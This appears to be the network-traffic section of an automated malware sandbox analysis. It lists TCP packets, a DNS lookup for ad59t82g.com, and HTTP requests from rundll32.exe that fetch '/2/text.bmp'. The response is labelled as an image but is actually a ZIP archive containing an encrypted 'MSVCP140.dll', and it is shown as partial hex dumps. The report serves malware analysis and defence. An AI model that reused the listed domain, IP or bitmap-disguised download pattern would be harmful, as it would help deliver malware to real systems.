Dec 27, 2024 06:22:16.055155993 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.055428028 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.055499077 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.055563927 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.056413889 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.056555986 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.056627989 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.057406902 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.057521105 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.057573080 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.058397055 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.058522940 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.058576107 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.059420109 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.059519053 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.059572935 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.060405970 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.060537100 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.060590982 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.061392069 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.061502934 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.061553955 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.062376976 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.062488079 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.062535048 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.063399076 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.063497066 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.063545942 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.064395905 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.064588070 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.064646006 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.065370083 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.065495014 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.065543890 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.066395998 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.066469908 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.066574097 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.067370892 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.067487001 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.067532063 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.068360090 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.068473101 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.068522930 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.069365025 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.069470882 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.069540024 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.070363998 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.070594072 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.070647001 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.071350098 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.071476936 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.071530104 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.072094917 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.072213888 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.072264910 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.072855949 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.072882891 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.072937965 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.073604107 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.073714972 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.073788881 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.074342012 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.074469090 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.074517965 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.075078964 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.075212955 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.075303078 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.075838089 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.075923920 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.075969934 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.076569080 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.076693058 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.076740026 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.077372074 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.077502966 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.077554941 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.078083038 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.078145981 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.078221083 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.098248005 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.098351955 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.098412991 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.098597050 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.098727942 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.098787069 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.099337101 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.099447012 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.099512100 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.100054979 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.100161076 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.100209951 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.100800037 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.100841045 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.100887060 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.101535082 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.101641893 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.101706982 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.102233887 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.102355003 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.102404118 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.102957010 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.103070974 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.103142977 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.103694916 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.103796005 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.103866100 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.104382038 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.104495049 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.104543924 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.105081081 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.105243921 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.105303049 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.105793953 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.105940104 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.105998039 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.106487989 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.106594086 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.106638908 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.107172012 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.107270956 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.107426882 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.107878923 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.108069897 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.108125925 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.108566999 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.108680964 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.108735085 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.109227896 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.109344959 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.109400988 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.109970093 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.110035896 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.110120058 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.110600948 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.110711098 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.110759974 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.111272097 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.111376047 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.111442089 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.112137079 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.112247944 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.112317085 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.112601995 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.112718105 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.112766981 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.113290071 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.113385916 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.113445997 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.113938093 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.114049911 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.114099026 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.114620924 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.114737034 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.114783049 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.115274906 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.115401983 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.115459919 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.115963936 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.116043091 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.116091013 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.315843105 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.315892935 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.315964937 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.316004992 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.316046953 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.316111088 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.316689014 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.316807032 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.316914082 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.317351103 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.317462921 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.317557096 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.318033934 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.318135023 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.318197966 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.318691015 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.318819046 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.318979979 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.319353104 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.319466114 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.319706917 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.320049047 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.320173979 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.320379019 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.320697069 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.320813894 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.321304083 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.321351051 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.321464062 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.322045088 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.322140932 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.322165966 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.322266102 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.322715044 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.322829008 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.323014975 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.323395967 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.323515892 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.323616982 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.324048042 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.324168921 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.324707031 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.324805021 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.324841022 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.325187922 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.325381994 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.325488091 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.326037884 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.326144934 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.326148033 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.326248884 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.326710939 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.326834917 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.327383041 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.327491999 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.327545881 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.327668905 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.328044891 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.328154087 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.328387022 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.328720093 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.328835964 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.329102993 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.329391003 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.329504013 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.329629898 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:16.330058098 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.330127954 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:16.330287933 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:17.907387972 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:18.026913881 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:18.388911963 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:18.389417887 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:18.508927107 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:18.721013069 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:18.721103907 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:18.721302032 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:18.721308947 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:18.767735958 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:19.768471003 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:19.887940884 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:20.245400906 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:20.246222973 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:20.365758896 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:20.584721088 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:20.584830046 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:20.584999084 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:20.585001945 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:20.627127886 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:41.847944021 CET	49730	80	192.168.2.4	104.21.22.88

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 06:22:09.523690939 CET	58197	53	192.168.2.4	1.1.1.1
Dec 27, 2024 06:22:09.800762892 CET	53	58197	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2024 06:22:09.523690939 CET	192.168.2.4	1.1.1.1	0x968e	Standard query (0)	ad59t82g.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 27, 2024 06:22:09.800762892 CET	1.1.1.1	192.168.2.4	0x968e	No error (0)	ad59t82g.com		104.21.22.88	A (IP address)	IN (0x0001)	false
Dec 27, 2024 06:22:09.800762892 CET	1.1.1.1	192.168.2.4	0x968e	No error (0)	ad59t82g.com		172.67.203.195	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ad59t82g.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.21.22.88	80	7676	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 06:22:10.077848911 CET	116	OUT	HEAD /2/text.bmp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ad59t82g.com
Dec 27, 2024 06:22:11.345278025 CET	878	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 05:22:11 GMT Content-Type: image/x-ms-bmp Content-Length: 231953 Connection: keep-alive Last-Modified: Wed, 23 Oct 2024 16:12:10 GMT ETag: "6719205a-38a11" Cache-Control: max-age=14400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IIDjEX5Dt5WJL8W%2FFwwOrlFh0nf3OdpckvV65IMEkhVovMdwHCAOkJMLBBtzNmHh7I1SMYLHsHMLwTSpD76nG4dxUh2NfDYxJW0KbwzoOwMCsUfb00qTEVp0vffNfRI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f86df12db577d1e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1971&min_rtt=1971&rtt_var=985&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=116&delivery_rate=0&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 27, 2024 06:22:11.347697020 CET	115	OUT	GET /2/text.bmp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ad59t82g.com
Dec 27, 2024 06:22:11.681175947 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 05:22:11 GMT Content-Type: image/x-ms-bmp Content-Length: 231953 Connection: keep-alive Last-Modified: Wed, 23 Oct 2024 16:12:10 GMT ETag: "6719205a-38a11" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 0 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A4k3nOfnwtLHAW7byKbv%2FDEHg%2FJ%2BEJ%2BcD3bC2FZEFC9GSTV5VZu4w0pKv98BwUfNgSja1ACfRYVGwMnoiB1GUYWzufAtJPxCHsB5zNzvYpjytsvWJ2bvNT5%2Bfl5FsCM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f86df15fe557d1e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4162&min_rtt=1971&rtt_var=5122&sent=3&recv=5&lost=0&retrans=0&sent_bytes=878&recv_bytes=231&delivery_rate=74864&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 50 4b 03 04 14 00 00 00 00 00 96 01 58 59 00 00 00 00 00 00 00 00 00 00 00 00 05 00 11 00 74 65 78 74 2f 55 54 0d 00 07 db 90 19 67 db 90 19 67 db 90 19 67 50 4b 03 04 14 00 09 00 08 00 ae 88 37 58 00 00 00 00 00 00 00 00 78 a9 06 00 11 00 11 00 74 65 78 74 2f 4d 53 56 43 50 31 34 30 2e 64 6c 6c 55 54 0d 00 07 d3 f1 af 65 2c 20 19 67 2b 56 ec 66 35 4f c3 bc f1 a4 c9 bd bc 14 31 c4 75 15 bd d3 c2 29 19 ce 46 a8 0f 81 13 8a 36 76 a0 c2 69 4e 21 8d fd af 43 4d 7d 85 2f fe b7 d9 51 87 b4 70 3f cc fe df 07 83 b0 14 fb 19 76 09 f7 fd 17 5a cf 66 a2 68 ea fc 06 45 d9 8a fc 4b 22 55 b9 07 6b 4e 37 ca 74 20 84 7b f1 5a 03 94 5c 32 dc bb 83 8f db 28 72 e6 a5 5f ec 88 20 42 62 fd f2 54 09 93 bb 9e 0f 9d 99 3d 0d e5 f2 d4 c8 c2 d6 bb de a9 99 88 7d d1 da fb 78 82 3c b4 34 11 96 11 3d 77 ee a9 56 71 c3 c7 43 4e fe a2 03 14 94 ca dd 32 11 87 06 80 6b 76 93 80 bf 83 58 1d 72 37 60 b9 1d 0c b1 ca c8 da f5 33 92 a9 f9 e6 d9 ac 62 c8 11 ee 6b 1c 1d 72 e8 f1 b4 73 95 e8 7b 7b 90 aa 4f da 00 c3 3b 3c 86 5d 85 f0 Data Ascii: PKXYtext/UTgggPK7Xxtext/MSVCP140.dllUTe, g+Vf5O1u)F6viN!CM}/Qp?vZfhEK"UkN7t {Z\2(r_ BbT=}x<4=wVqCN2kvXr7`3bkrs{{O;<]
Dec 27, 2024 06:22:11.681236982 CET	1236	IN	Data Raw: 21 55 7b c2 6f e5 e7 00 91 b3 75 4a 42 86 87 b4 fc c2 bd d9 0e 37 19 b6 b6 1d 5e 29 41 f0 a4 fa 3b df 22 16 31 3e 1c 35 da de 77 f6 1f b2 0d 7b 20 3e 36 5a 0f 3e bc 08 07 e5 bf 85 09 d6 7a 63 71 5a a8 45 f3 92 1a 86 ed b3 1a 13 9a 80 58 70 c0 89 Data Ascii: !U{ouJB7^)A;"1>5w{ >6Z>zcqZEXp)d.%fn#\6Q%ZM0>>y,dmj(iA?'Oi:9)uR%]~?gIFNj5xjHJD{6"_9y}8mN{H=ihq~>Q
Dec 27, 2024 06:22:11.681274891 CET	1236	IN	Data Raw: f4 c9 30 a0 30 cb db 44 3e c8 4c 78 d5 56 52 28 f8 f7 b1 f6 8f 7e 0a 86 30 54 a7 0b f1 e5 cf e8 64 0b e5 66 bb a7 cb ca f5 0e d1 c2 b8 ab d2 f7 de 8a 17 1b 85 51 10 1c 89 3d 98 9c b6 45 87 cb 07 be de a8 82 2e 52 e8 e9 23 97 86 e8 57 68 ea 59 72 Data Ascii: 00D>LxVR(~0TdfQ=E.R#WhYrL@x%~8;Sl~F&NYEtPP!T1AlOgjX^J'VAl$;}}{wp^5m#B0j3+DE7R aYd5D0M=^l&/
Dec 27, 2024 06:22:11.681314945 CET	1236	IN	Data Raw: b8 34 81 30 a0 e2 5f 9f 06 ef a3 cf fa bd b4 d1 78 1d e7 af 7c fd cf bb a3 ef 4d 5b fe 49 dd 24 36 a2 41 59 e2 72 1b 1d 41 13 38 43 e4 22 0b fa 4b bb 19 67 82 0a b4 b0 e1 a5 4b fd 9c c8 a2 ff e5 37 a9 0f e6 a4 30 6a f8 a5 5b a3 aa f6 13 b9 97 f7 Data Ascii: 40_x\|M[I$6AYrA8C"KgK70j[}5`(AG[R/IAX8unaj#(au`/6c YJQh@UAx<zF?Eo)}v >vhn%Y+jB9CN,\|({R9M\|[lX:"
